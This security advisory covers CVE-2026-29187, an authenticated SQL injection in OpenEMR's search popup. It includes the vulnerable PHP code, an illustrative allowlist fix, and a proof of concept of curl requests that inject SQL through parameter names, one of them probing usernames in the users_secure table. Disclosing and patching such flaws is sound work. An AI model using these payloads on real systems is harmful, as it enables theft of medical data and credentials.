📄 OpenEMR 8.0.0.2 SQL Injection

Published: 26 Mar 2026 00:00:00. Reported by Christophe SUBLET. Type: packetstorm. Source: packetstorm.news. 103 views.

OpenEMR search popup SQL injection via unsanitized input.

Related entries for the same vulnerability in other trackers:

| Family | Title | Published | Reporter |
|---|---|---|---|
| ATTACKERKB | CVE-2026-29187 | 25 Mar 2026 22:24 | attackerkb |
| Circl | CVE-2026-29187 | 25 Mar 2026 23:20 | circl |
| CNNVD | OpenEMR SQL injection vulnerability | 25 Mar 2026 00:00 | cnnvd |
| CVE | CVE-2026-29187 | 25 Mar 2026 22:24 | cve |
| Cvelist | CVE-2026-29187 OpenEMR Vulnerable to Authenticated Blind Boolean-Based SQL Injection in new_search_popup.php | 25 Mar 2026 22:24 | cvelist |
| EUVD | EUVD-2026-16008 | 25 Mar 2026 22:24 | euvd |
| NVD | CVE-2026-29187 | 25 Mar 2026 23:17 | nvd |
| OSV | CVE-2026-29187 OpenEMR Vulnerable to Authenticated Blind Boolean-Based SQL Injection in new_search_popup.php | 25 Mar 2026 22:24 | osv |
| Packet Storm | OpenEMR 8.0.0.2 SQL Injection | 20 Apr 2026 00:00 | packetstorm |
| Positive Technologies | PT-2026-28135 | 25 Mar 2026 00:00 | ptsecurity |
# CVE-2026-29187 - SQL Injection Vulnerability in new search popup

>  Weakness CWE-89
>> Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
>> The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data. Learn more on MITRE.

### Summary

OpenEMR versions before 8.0.0.3 contain an SQL injection vulnerability in the new search popup that can be exploited by authenticated attackers. The vulnerability exists because the new search popup does not validate the search field names it receives.

### Details

The vulnerability occurs in the new search popup functionality: the names of user-supplied `mf_*` request parameters are used as column names and concatenated directly into both the SELECT relevance expression and the WHERE condition without being validated as identifiers. This allows attackers to inject arbitrary SQL.

The vulnerability affects the following lines:

 - `interface/new/new_search_popup.php` [line 141](https://github.com/openemr/openemr/blob/7f27cbd146104b9adaffc4be3bd1185c28505873/interface/new/new_search_popup.php#L141)
 - `interface/new/new_search_popup.php` line [134](https://github.com/openemr/openemr/blob/7f27cbd146104b9adaffc4be3bd1185c28505873/interface/new/new_search_popup.php#L134) and [136](https://github.com/openemr/openemr/blob/7f27cbd146104b9adaffc4be3bd1185c28505873/interface/new/new_search_popup.php#L136)
 - `interface/new/new_search_popup.php` line [125](https://github.com/openemr/openemr/blob/7f27cbd146104b9adaffc4be3bd1185c28505873/interface/new/new_search_popup.php#L125) and [128](https://github.com/openemr/openemr/blob/7f27cbd146104b9adaffc4be3bd1185c28505873/interface/new/new_search_popup.php#L128)

```php
foreach ($_REQUEST as $key => $value) {
    if (!str_starts_with((string) $key, 'mf_')) {
        continue; // "match field"
    }
    // $fldname is taken verbatim from the request parameter name (e.g. "mf_lname" -> "lname").
    $fldname = substr((string) $key, 3);
    // pubpid requires special treatment.  Match on that is fatal.
    // add_escape_custom() escapes quote characters for use inside a string
    // literal, but $fldname is placed here as a bare column identifier, so any
    // quote-free SQL in the parameter name passes through unchanged.
    if ($fldname == 'pubpid') {
        $relevance .= " + 1000 * ( " . add_escape_custom($fldname) . " LIKE ? )";
        array_push($sqlBindArray, $value);
    } else {
        $relevance .= " + ( " . add_escape_custom($fldname) . " LIKE ? )";
        array_push($sqlBindArray, $value);
    }
    // The same unvalidated identifier is repeated in the WHERE clause.
    $where .= " OR " . add_escape_custom($fldname) . " LIKE ?";
    array_push($sqlBindArraySpecial, $value);
    echo "<input type='hidden' name='" . attr($key) . "' value='" . attr($value) . "' />\n";
    ++$numfields;
}

$sql = "SELECT *, ( $relevance ) AS relevance, " .
    "DATE_FORMAT(DOB,'%m/%d/%Y') as DOB_TS " .
    "FROM patient_data WHERE $where " .
    "ORDER BY relevance DESC, lname, fname, mname " .
    "LIMIT " . escape_limit($fstart) . ", " . escape_limit($MAXSHOW) . "";

$sqlBindArray = array_merge($sqlBindArray, $sqlBindArraySpecial);
$rez = sqlStatement($sql, $sqlBindArray);
```

```sql
SELECT *, ( 0 + ( <injection> LIKE ? ) ) AS relevance, DATE_FORMAT(DOB,'%m/%d/%Y') as DOB_TS FROM patient_data WHERE 1 = 0 OR <injection> LIKE ? ORDER BY relevance DESC, lname, fname, mname LIMIT 0, 100
```
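As an added example that is not code from the advisory and not OpenEMR's actual patch, the following shows the usual remedy for an identifier injected this way: the `mf_` suffix is checked against an allowlist of searchable columns instead of being escaped, so the request is refused before any SQL is built. `SEARCHABLE_FIELDS` and `buildSearchQuery()` are assumed names for this illustration.

```php
<?php
// Added illustration, not OpenEMR's own fix: the allowlist and function name are assumptions.
declare(strict_types=1);

// Assumed allowlist of patient_data columns a user may search on.
const SEARCHABLE_FIELDS = ['pubpid', 'fname', 'lname', 'mname', 'DOB', 'phone_home'];

// Builds the same relevance/where fragments as the vulnerable loop, but only for
// allowlisted field names. Returns [sql, bind values]; throws on an unknown column.
function buildSearchQuery(array $request, int $fstart = 0, int $maxshow = 100): array
{
    $relevance = '0';
    $where = '1 = 0';
    $bindRelevance = [];
    $bindWhere = [];
    foreach ($request as $key => $value) {
        if (!str_starts_with((string) $key, 'mf_')) {
            continue;
        }
        $fldname = substr((string) $key, 3);
        // A column name is an identifier: escaping cannot make it safe, so
        // anything outside the allowlist is rejected before any SQL is built.
        if (!in_array($fldname, SEARCHABLE_FIELDS, true)) {
            throw new InvalidArgumentException('Unknown search field: ' . $fldname);
        }
        $column = '`' . $fldname . '`';
        $weight = ($fldname === 'pubpid') ? '1000 * ' : '';
        $relevance .= " + {$weight}( {$column} LIKE ? )";
        $bindRelevance[] = $value;
        $where .= " OR {$column} LIKE ?";
        $bindWhere[] = $value;
    }
    $sql = "SELECT *, ( $relevance ) AS relevance, "
        . "DATE_FORMAT(DOB,'%m/%d/%Y') AS DOB_TS FROM patient_data WHERE $where "
        . "ORDER BY relevance DESC, lname, fname, mname "
        . 'LIMIT ' . max(0, $fstart) . ', ' . max(1, $maxshow);
    return [$sql, array_merge($bindRelevance, $bindWhere)];
}

// Constructed requests: a legitimate search, then a key shaped like the first PoC.
[$sql, $binds] = buildSearchQuery(['mf_lname' => 'Smith%', 'fstart' => '0']);
echo $sql, PHP_EOL;
try {
    buildSearchQuery(['mf_"' => 'test']);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
```

The first call yields a query whose only request-derived identifier is the allowlisted `lname`, with the search value still passed as a bind parameter; the second is refused before anything reaches `sqlStatement()`.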
    
### PoC

```
┌──(kali㉿kali)-[~]
└─$ curl -k -b "OpenEMR=5cb438753a9513cb01f5adc257ab474f" 'https://172.18.0.3/interface/new/new_search_popup.php?mf_"=test'
<!DOCTYPE html>
<html>
<head>

<meta charset="utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
<link rel="shortcut icon" href="/public/images/logos/core/favicon/favicon.ico?t=1766556932" />

<link rel="stylesheet"  href="/public/themes/style_light.css?v=81" />

<script src="/public/assets/jquery/dist/jquery.min.js?v=81" type="text/javascript"></script>
<script src="/public/assets/bootstrap/dist/js/bootstrap.bundle.min.js?v=81" type="text/javascript"></script>
<script src="/library/js/utility.js?v=81" type="text/javascript"></script>
<script src="/interface/main/tabs/js/include_opener.js?v=81" type="text/javascript"></script>
<script src="/library/textformat.js?v=81" type="text/javascript"></script>
<script src="/library/dialog.js?v=81" type="text/javascript"></script>

<style>
  form {
    padding: 0;
    margin: 0;
  }

  #searchCriteria {
    text-align: center;
    width: 100%;
    font-size: 0.8rem;
    background-color: var(--gray300);
    font-weight: bold;
    padding: 3px;
  }

  #searchResultsHeader th {
    font-size: 0.7rem;
  }

  #searchResults {
    width: 100%;
    height: 80%;
    overflow: auto;
  }

  #searchResults table {
    width: 100%;
    border-collapse: collapse;
    background-color: var(--white);
  }

  #searchResults tr {
    cursor: pointer;
  }

  #searchResults td {
    font-size: 0.7rem;
    border-bottom: 1px solid var(--gray200);
  }

  .topResult {
    background-color: #ff9919;
  }

  .billing {
    color: var(--danger);
    font-weight: bold;
  }

  .highlight {
    background-color: var(--info);
    color: var(--white);
  }
</style>
</head>
<body class="body_top">
    <form method='post' action='new_search_popup.php' name='theform'>
        <input type="hidden" name="csrf_token_form" value="8d463d08b7f4e590085af22b77cfb2d3b921cb73" />
        <input type='hidden' name='fstart' value='0' />
        <input type='hidden' name='mf_"' value='test' />
SQL Statement failed on preparation: SELECT *, ( 0 + ( \" LIKE ? ) ) AS relevance, DATE_FORMAT(DOB,&#039;%m/%d/%Y&#039;) as DOB_TS FROM patient_data WHERE 1 = 0 OR \" LIKE ? ORDER BY relevance DESC, lname, fname, mname LIMIT 0, 100'<br>
<h2><font color='red'>Query Error</font></h2><p><font color='red'>ERROR:</font> query failed: SELECT *, ( 0 + ( \" LIKE ? ) ) AS relevance, DATE_FORMAT(DOB,'%m/%d/%Y') as DOB_TS FROM patient_data WHERE 1 = 0 OR \" LIKE ? ORDER BY relevance DESC, lname, fname, mname LIMIT 0, 100</p><p>Error: <font color='red'>You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '\" LIKE ? ) ) AS relevance, DATE_FORMAT(DOB,'%m/%d/%Y') as DOB_TS FROM patien...' at line 1</font></p><br />/var/www/localhost/htdocs/openemr/interface/new/new_search_popup.php at 141:sqlStatement
┌──(kali㉿kali)-[~]
└─$ curl -k -b "OpenEMR=5cb438753a9513cb01f5adc257ab474f" 'http://172.18.0.3/interface/new/new_search_popup.php?mf_(SELECT(username)FROM(users_secure))=ad_in%'

┌──(kali㉿kali)-[~]
└─$ 
```

There are multiple techniques to exploit it; one of them is a boolean-based attack, which is what the last payload above performs:

```sql
SELECT *, ( 0 + ( (SELECT(username)FROM(users_secure)) LIKE "ad_in%" ) ) AS relevance, DATE_FORMAT(DOB,'%m/%d/%Y') as DOB_TS FROM patient_data WHERE 1 = 0 OR (SELECT(username)FROM(users_secure)) LIKE "ad_in%" ORDER BY relevance DESC, lname, fname, mname LIMIT 0, 100
```

### Impact

 - Unauthorized access to database information
 - Potential data breach of sensitive medical information
 - Server-side code execution (in some cases)
 - Database compromise

### Vulnerability Fix Process

1. Assess and validate the vulnerability
2. Request or assign a CVE ID
3. Create a private fork or private branch
4. Develop the fix
5. Write regression and security tests
6. Prepare release notes and security advisory draft
7. Publish the fix (code merge) and release a patched version
8. Publicly disclose the vulnerability

### Credits

 - Researcher: Christophe SUBLET
 - Organization: Grenoble INP - Esisar, UGA
 - Project: CyberSkills, Orion

Scores (current as of 26 Mar 2026 00:00):

- Vulners AI Score: 5.9 (medium risk)
- CVSS 3.1: 8.1 - 8.8
- EPSS: 0.00473